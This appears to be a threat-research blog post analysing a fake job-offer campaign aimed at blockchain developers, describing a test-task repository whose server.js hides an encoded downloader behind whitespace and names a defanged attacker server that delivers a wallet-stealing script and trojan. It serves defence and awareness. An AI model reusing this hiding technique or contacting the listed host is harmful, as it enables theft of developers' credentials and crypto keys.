Find jobs or trouble. A new threat to blockchain developers and crypto projects

The work of hackers, although difficult, is definitely not boring. They regularly need to come up with methods to deceive the most experienced professionals. And these methods are getting more sophisticated every time. GetBlock AML Research has analyzed one of the threats to blockchain developers and crypto projects that can catch up when looking for a job.

Who pulls the strings

The large-scale compromise of employees for hacking first became known in 2015. Back then, the Lazarus Group, a hacker group with alleged ties to North Korea, gained access to Bangladesh Bank’s accounts and ecosystem. Over a year, the hackers sent various phishing emails to the bank’s employees, to which they attached files with malicious code. One of these emails still managed to mislead a bank employee who downloaded the malicious file. The attackers then gained access to the bank’s infrastructure, and it was only a matter of time before the funds were stolen. Then Lazarus Group managed to steal $81 million.

10 years later, hackers are using the same techniques, but with more advanced social engineering skills. Now they pretend to be recruiters searching for highly paid professionals. Here’s a real-life case study in which hackers attempted to hack into an organization by compromising one of its employees.

How to launder $1,5 billion worth of crypto in 5 easy steps. Lazarus Group case

Crypto exchange Bybit managed to block only $42,8 million. This is less than 3% of the total value of stolen assets

Read more

On the hook

The alleged victim received an email from a malicious recruiter describing the details of the project, the terms of employment, and listing the skills required of the employee. The text was as similar as possible to a real offer of cooperation and did not contain any suspicious wording.

A real letter from an attacker in Google Mail

The letter also states that its recipient was recommended for a vacant position, so it was his candidacy that interested the “employer”. According to the legend, the job seeker is to develop a gaming platform of smart contracts for betting. The hacker-recruiter provided working materials (a link in Figma to the preliminary design of the project).

The employment process was also described in advance by the attacker and consisted of three stages:

1. Background and skills check
2. Test design task
3. Technical interview

The hacker did not give any suspicious signs at the first stage and gave himself away only at the second stage. He started calling the applicant and persuaded him to do the test assignment as soon as possible, as the project urgently needs a developer. The potential victim was sent a link to the repository.

Repository content

The repository content, description, and metadata are fully consistent with the declared project. However, if you analyze the code carefully, you may find something. The most interesting part of the code was hidden in the server.js file on line 46.

An attempt to hide the code using spaces in the server.js file

The line may seem empty at first sight. In fact, the code on the line was hidden using spaces, and you should move the scroll bar to the right to see it. The hidden part of the code contains a function that downloads malicious code to the device.

The hidden part of the code in the server.js file

Even if a hidden download is detected, it will be impossible to identify the malicious code because it is base64 encoded several times. The exploit is designed in such a way that even in the case of a successful hack, the victim will not know about the compromise. Therefore, if the project is compiled, everything works successfully.

WARNING: Do not run suspicious code on your own devices. All operations performed below are performed using a virtual machine.

Compiled project with malicious code

After successful compilation and launching the project, the application described by the hacker-recruiter is opened. Externally, there are no signs of hacking, but the suspicious code, which is located in the server.js file, sends a request (http://216.173.115[.]200:1244/s/bc7302f71ff3) to download malicious test.js and .npl files.

Downloading malicious test.js and .npl files

The test.js script is used to steal browser data, particularly accounts and crypto wallet private keys. The .npl trojan is needed to gain control of a device. Once these files are launched, they contact the attacker’s server and transfer the necessary information to it. At this stage, the hack can be considered successful.

How a developer can protect himself

• The case discussed above is not the only example of how attackers distribute malicious code. Recruiters often use Telegram, Discord, and other ways to contact potential victims. To protect yourself from such schemes, we recommend:
• Carefully check all information about job/freelance offers. Check data with official sources. Contact official representatives of the company/organization to confirm the contact;
• Carefully study the third-party code to be downloaded/run. All interactions with unknown code should be done in a virtual machine;
• Don’t go along with attackers if they set too urgent deadlines (in the hope that you will ignore security principles in your haste);
• Be especially suspicious of job offers if the potential salary is significantly higher than the market average;
• Disable automatic file and media uploading in Telegram, Discord, and other messengers.

How to protect your company

• Educate your staff about phishing attacks and hackers’ tools;
• Regularly simulate potential attacks on your employees, identify their actions in these situations, and conduct a debriefing of the attack;
• Use security software that identifies malicious elements in messengers and email clients;
• Eliminate the possibility of confidential information leaks.